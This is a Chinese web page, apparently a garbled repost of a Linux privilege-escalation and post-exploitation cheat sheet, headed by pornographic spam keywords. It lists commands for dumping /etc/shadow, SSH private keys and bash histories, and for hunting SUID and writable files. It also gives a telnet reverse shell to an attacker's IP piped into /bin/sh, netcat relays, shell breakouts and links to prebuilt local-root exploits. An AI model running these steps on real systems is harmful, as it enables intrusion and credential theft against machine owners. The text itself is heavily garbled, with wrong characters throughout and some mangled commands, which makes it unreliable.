国产精品香蕉在线观看网,亚洲欧美精品综合在线观看,亚洲不卡av一区二区无码不卡,亚洲日本精品国产第一区二区

移動安全 安全管理 應(yīng)用案例 網(wǎng)絡(luò)威脅 系統(tǒng)安全應(yīng)用安全 數(shù)據(jù)安全 云安全
當(dāng)前位置: 主頁 > 信息安全 > 應(yīng)用安全 >

Linux提權(quán)后獲得敏感信息的編制與路子

時間:2013-10-21 12:55來源:TuZhiJiaMi企業(yè)信息安全專家 點擊:
在本文開端之前,我想指出我不是專家。據(jù)我所知,在這個復(fù)雜年夜的區(qū)域,沒有一個“奇異”的謎底.分享,共享(我的解纜點)。下面是一個同化的號令做一樣的工作,在不合的處所,或只是一
Tags應(yīng)用安全(1006)Linux(46)敏感信息(10)  

  在本文開端之前,我想指出我不是專家。據(jù)我所知,在這個復(fù)雜年夜的區(qū)域,沒有一個“奇異”的謎底.分享,共享(我的解纜點)。下面是一個同化的號令做一樣的工作,在不合的處所,或只是一個不合的目光來對待事物。我知道有更多的“東西”往尋覓。這只是一個根基粗略的指南。其實不是每個號令,做好要重視細(xì)節(jié).

  文中的每行動一條號令,文中有的號令可能在你的主機上敲不出來,因為它多是在其他版本的linux中所利用的號令。

  列舉關(guān)頭點

  (Linux)的提權(quán)是如何一回事:

  匯集 – 列舉,列舉和一些更多的列舉。

  過程 – 經(jīng)由過程數(shù)據(jù)排序,闡發(fā)和肯定優(yōu)先挨次。

  搜刮 – 知道搜刮甚么和在哪里可以找到縫隙代碼。

  適應(yīng) – 自定義的縫隙,所以它合適。每個系統(tǒng)的工作其實不是每個縫隙“都固定不變”。

  測驗測驗 – 做好預(yù)備,實驗和弊端。

  把持類型

  把持類型是甚么版本?

  1cat /etc/issue

  2cat /etc/*-release

  3cat /etc/lsb-release

  4cat /etc/redhat-release

  它的內(nèi)核版本是甚么?

  1cat /proc/version

  2uname -a

  3uname -mrs

  4rpm -q kernel

  5dmesg | grep Linux

  6ls /boot | grep vmlinuz

  它的環(huán)境變量里有些甚么?

  1cat /etc/profile

  2cat /etc/bashrc

  3cat ~/.bash_profile

  4cat ~/.bashrc

  5cat ~/.bash_logout

  6env

  7set

  是不是有臺打印機?

  1lpstat -a

  利用與辦事

  正在運行甚么辦事?甚么樣的辦事具有甚么用戶權(quán)限?

  1ps aux

  2ps -ef

  3top

  4cat /etc/service

  哪些辦事具有root的權(quán)限?這些辦事里你看起來那些有縫隙,進(jìn)行再次查抄!

  1ps aux | grep root

  2ps -ef | grep root

  安裝了哪些利用法度?他們是甚么版本?哪些是當(dāng)前正在運行的?

  1ls -alh /usr/bin/

  2ls -alh /sbin/

  3dpkg -l

  4rpm -qa

  5ls -alh /var/cache/apt/archivesO

  6ls -alh /var/cache/yum/

  Service設(shè)置,有任何的弊端建設(shè)嗎?是不是有任何(脆弱的)的插件?

  01cat /etc/syslog.conf

  02cat /etc/chttp.conf

  03cat /etc/lighttpd.conf

  04cat /etc/cups/cupsd.conf

  05cat /etc/inetd.conf

  06cat /etc/apache2/apache2.conf

  07cat /etc/my.conf

  08cat /etc/httpd/conf/httpd.conf

  09cat /opt/lampp/etc/httpd.conf

  10ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

  主機上有哪些工作打算?

  01crontab -l

  02ls -alh /var/spool/cron

  03ls -al /etc/ | grep cron

  04ls -al /etc/cron*

  05cat /etc/cron*

  06cat /etc/at.allow

  07cat /etc/at.deny

  08cat /etc/cron.allow

  09cat /etc/cron.deny

  10cat /etc/crontab

  11cat /etc/anacrontab

  12cat /var/spool/cron/crontabs/root

  主機上可能有哪些純文本用戶名和暗碼?

  1grep -i user [filename]

  2grep -i pass [filename]

  3grep -C 5 "password" [filename]

  4find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla

  通信與收集

  NIC(s),系統(tǒng)有哪些?它是連接到哪個收集?

  1/sbin/ifconfig -a

  2cat /etc/network/inte***ces

  3cat /etc/sysconfig/network

  收集建設(shè)設(shè)置是甚么?收集中有甚么樣的辦事器?DHCP辦事器?DNS辦事器?網(wǎng)關(guān)?

  1cat /etc/resolv.conf

  2cat /etc/sysconfig/network

  3cat /etc/networks

  4iptables -L

  5hostname

  6dnsdomainname

  其他用戶主機與系統(tǒng)的通信?

  01lsof -i

  02lsof -i :80

  03grep 80 /etc/services

  04netstat -antup

  05netstat -antpx

  06netstat -tulpn

  07chkconfig --list

  08chkconfig --list | grep 3:on

  09last

  10w

  緩存?IP和/或MAC地址?

  1arp -e

  2route

  3/sbin/route -nee

  數(shù)據(jù)包可能嗅探嗎?可以看出甚么?監(jiān)聽流量

  1# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

  2tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21

  你若何get一個shell?你若何與系統(tǒng)進(jìn)行交互?

  # http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

  1nc -lvp 4444 # Attacker. 輸進(jìn) (號令)

  2nc -lvp 4445 # Attacker. 輸出(成果)

  telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445 # 在方針系統(tǒng)上. 利用 報復(fù)打擊者的IP!

  若何端口轉(zhuǎn)發(fā)?(端口重定向)

  # rinetd

  1# http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch

  # fpipe

  1# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]

  2FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

  #ssh

  1# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]

  2ssh -L 8080:127.0.0.1:80 [email protected] # Local Port

  3ssh -R 8080:127.0.0.1:80 [email protected] # Remote Port

  #mknod

  1# mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe

  2mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay

  3mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)

  4mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)

  成立地道可能嗎?本地,長途發(fā)送號令

  1ssh -D 127.0.0.1:9050 -N [username]@[ip]

  2proxychains ifconfig

  奧秘信息和用戶

  你是誰?哪個id登錄?誰已登錄?還有誰在這里?誰可以做甚么呢?

  1id

  2who

  3w

  4last

  5cat /etc/passwd | cut -d: # List of users

  6grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users

  7awk -F: '($3 == "0") {print}' /etc/passwd # List of super users

  8cat /etc/sudoers

  9sudo -l

  可以找到甚么敏感文件?

  1cat /etc/passwd

  2cat /etc/group

  3cat /etc/shadow

  4ls -alh /var/mail/

  甚么有趣的文件在home/directorie(S)里?假定有權(quán)限拜候

  1ls -ahlR /root/

  2ls -ahlR /home/

  是不是有任何暗碼,腳本,數(shù)據(jù)庫,建設(shè)文件或日記文件?暗碼默許路徑和位置

  1cat /var/apache2/config.inc

  2cat /var/lib/mysql/mysql/user.MYD

  3cat /root/anaconda-ks.cfg

  用戶做過甚么?是不是有任何暗碼呢?他們有沒有編纂甚么?

  1cat ~/.bash_history

  2cat ~/.nano_history

  3cat ~/.atftp_history

  4cat ~/.mysql_history

  5cat ~/.php_history

  可以找到甚么樣的用戶信息

  1cat ~/.bashrc

  2cat ~/.profile

  3cat /var/mail/root

  4cat /var/spool/mail/root

  private-key 信息可否被發(fā)現(xiàn)?

  01cat ~/.ssh/authorized_keys

  02cat ~/.ssh/identity.pub

  03cat ~/.ssh/identity

  04cat ~/.ssh/id_rsa.pub

  05cat ~/.ssh/id_rsa

  06cat ~/.ssh/id_dsa.pub

  07cat ~/.ssh/id_dsa

  08cat /etc/ssh/ssh_config

  09cat /etc/ssh/sshd_config

  10cat /etc/ssh/ssh_host_dsa_key.pub

  11cat /etc/ssh/ssh_host_dsa_key

  12cat /etc/ssh/ssh_host_rsa_key.pub

  13cat /etc/ssh/ssh_host_rsa_key

  14cat /etc/ssh/ssh_host_key.pub

  15cat /etc/ssh/ssh_host_key

  文件系統(tǒng)

  哪些用戶可以寫建設(shè)文件在/ etc /?可以或許從頭建設(shè)辦事?

  1ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone

  1ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner

  1ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group

  1ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other

  1find /etc/ -readable -type f 2>/dev/null # Anyone

  2find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone

  在/ var /有甚么可以發(fā)現(xiàn)?

  1ls -alh /var/log

  2ls -alh /var/mail

  3ls -alh /var/spool

  4ls -alh /var/spool/lpd

  5ls -alh /var/lib/pgsql

  6ls -alh /var/lib/mysql

  7cat /var/lib/dhcp3/dhclient.leases

  網(wǎng)站上的任何隱躲建設(shè)/文件?建設(shè)文件與數(shù)據(jù)庫信息?

  1ls -alhR /var/www/

  2ls -alhR /srv/www/htdocs/

  3ls -alhR /usr/local/www/apache22/data/

  4ls -alhR /opt/lampp/htdocs/

  5ls -alhR /var/www/html/

  有甚么在日記文件里?(甚么可以或許幫忙到“本地文件包含”?)

  # http://www.thegeekstuff.com/2011/08/linux-var-log-files/

  01cat /etc/httpd/logs/access_log

  02cat /etc/httpd/logs/access.log

  03cat /etc/httpd/logs/error_log

  04cat /etc/httpd/logs/error.log

  05cat /var/log/apache2/access_log

  06cat /var/log/apache2/access.log

  07cat /var/log/apache2/error_log

  08cat /var/log/apache2/error.log

  09cat /var/log/apache/access_log

  10cat /var/log/apache/access.log

  11cat /var/log/auth.log

  12cat /var/log/chttp.log

  13cat /var/log/cups/error_log

  14cat /var/log/dpkg.log

  15cat /var/log/faillog

  16cat /var/log/httpd/access_log

  17cat /var/log/httpd/access.log

  18cat /var/log/httpd/error_log

  19cat /var/log/httpd/error.log

  20cat /var/log/lastlog

  21cat /var/log/lighttpd/access.log

  22cat /var/log/lighttpd/error.log

  23cat /var/log/lighttpd/lighttpd.access.log

  24cat /var/log/lighttpd/lighttpd.error.log

  25cat /var/log/messages

  26cat /var/log/secure

  27cat /var/log/syslog

  28cat /var/log/wtmp

  29cat /var/log/xferlog

  30cat /var/log/yum.log

  31cat /var/run/utmp

  32cat /var/webmin/miniserv.log

  33cat /var/www/logs/access_log

  34cat /var/www/logs/access.log

  1ls -alh /var/lib/dhcp3/

  2ls -alh /var/log/postgresql/

  3ls -alh /var/log/proftpd/

  4ls -alh /var/log/samba/

  5# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp(有甚么文件?log.系統(tǒng)指導(dǎo)......)

  假定號令限制,你可以打出哪些沖破它的限制?

  1python -c 'import pty;pty.spawn("/bin/bash")'

  1echo os.system('/bin/bash')

  1/bin/sh -i

  若何安裝文件系統(tǒng)?

  1mount

  2df -h

  是不是有掛載的文件系統(tǒng)?

  1cat /etc/fstab

  甚么是高級Linux文件權(quán)限利用?Sticky bits, SUID 和GUID

  1find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here

  2find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.

  3find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.

  4find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID

  5for i in `locate -r "bin$"`; do find $i ( -perm -4000 -o -perm -2000 ) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

  6

  7# findstarting at root (/), SGIDorSUID, not Symbolic links, only 3 folders deep, list with more detail and hideany errors (e.g. permission denied)

  8

  9find/-perm -g=s-o-perm -4000! -type l-maxdepth 3 -exec ls -ld {} ;2>/dev/null

  在哪些目次可以寫進(jìn)和履行呢?幾個“共同”的目次:/ tmp目次,/var / tmp目次/ dev /shm目次

  1find / -writable -type d 2>/dev/null # world-writeable folders

  2find / -perm -222 -type d 2>/dev/null # world-writeable folders

  3find / -perm -o+w -type d 2>/dev/null # world-writeable folders

  4find / -perm -o+x -type d 2>/dev/null # world-executable folders

  5find / ( -perm -o+w -perm -o+x ) -type d 2>/dev/null # world-writeable & executable folders

  6Any "problem" files?可寫的的,“沒有益用"的文件

  7find / -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -print # world-writeable files

  8find /dir -xdev ( -nouser -o -nogroup ) -print # Noowner files

  預(yù)備和查找縫隙操縱代碼

  安裝了甚么開辟東西/說話/撐持?

  1find / -name perl*

  2find / -name python*

  3find / -name gcc*

  4find / -name cc

  若何上傳文件?

  1find / -name wget

  2find / -name nc*

  3find / -name netcat*

  4find / -name tftp*

  5find / -name ftp

  查找exploit代碼

  http://www.exploit-db.com

  http://1337day.com

  http://www.securiteam.com

  http://www.securityfocus.com

  http://www.exploitsearch.net

  http://metasploit.com/modules/

  http://securityreason.com

  http://seclists.org/fulldisclosure/

  http://www.谷歌.com

  查找更多有關(guān)縫隙的信息

  http://www.cvedetails.com

  http://packetstormsecurity.org/files/cve/[CVE]

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]]http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]

  http://www.vulnview.com/cve-details.php?cvename=[CVE]]http://www.vulnview.com/cve-details.php?cvename=[CVE]

  http://www.91ri.org/

  (快速)“共同的“exploit,預(yù)編譯二進(jìn)制代碼文件

  http://tarantula.by.ru/localroot/

  http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/

  上面的信息很難嗎?

  快往利用第三方腳本/東西來嘗嘗吧!

  系統(tǒng)如何打內(nèi)核,把持系統(tǒng),所有益用法度,插件和Web辦事的最新補丁?

  1apt-get update && apt-get upgrade

  2yum update

  辦事運行所需的最低的權(quán)限?

  例如,你需要以root身份運行MySQL?

  可以或許從以下網(wǎng)站找到主動運行的腳本?!

  http://pentestmonkey.net/tools/unix-privesc-check/

  http://labs.portcullis.co.uk/application/enum4linux/

  http://bastille-linux.sourceforge.net

  (快速)指南和鏈接

  例如

  http://www.0daysecurity.com/penetration-testing/enumeration.html

  http://www.microloft.co.uk/hacking/hacking3.htm

------分隔線----------------------------

推薦內(nèi)容